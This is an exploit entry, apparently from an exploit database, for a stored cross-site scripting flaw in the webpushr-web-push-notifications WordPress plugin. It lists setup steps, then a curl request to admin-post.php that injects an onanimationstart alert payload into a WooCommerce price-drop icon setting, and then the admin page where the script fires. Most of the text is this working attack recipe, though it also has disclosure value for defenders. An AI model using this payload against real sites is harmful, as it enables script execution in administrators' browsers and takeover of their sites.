Share
## https://sploitus.com/exploit?id=WPEX-ID:A03330C2-3AE0-404D-A114-33B18CC47666
1. Woocommerce needs to be installed as well as activating webpushr-web-push-notifications by creating an account.

2. Run the following curl request:

curl --url 'http://vulnerable-site.tld/wp-admin/admin-post.php' --data 'save_woo_settings=1&webpushr_price_drop=1&webpushr_woo_price_drop_icon="+style=animation-name:rotation;display:block+onanimationstart=alert(/XSS/)+x'

3. Have an administrator browse the price drop notification settings: http://vulnerable-site.tld/wp-admin/admin.php?page=webpushr-configuration&menu=price_drop#woocommerce_settings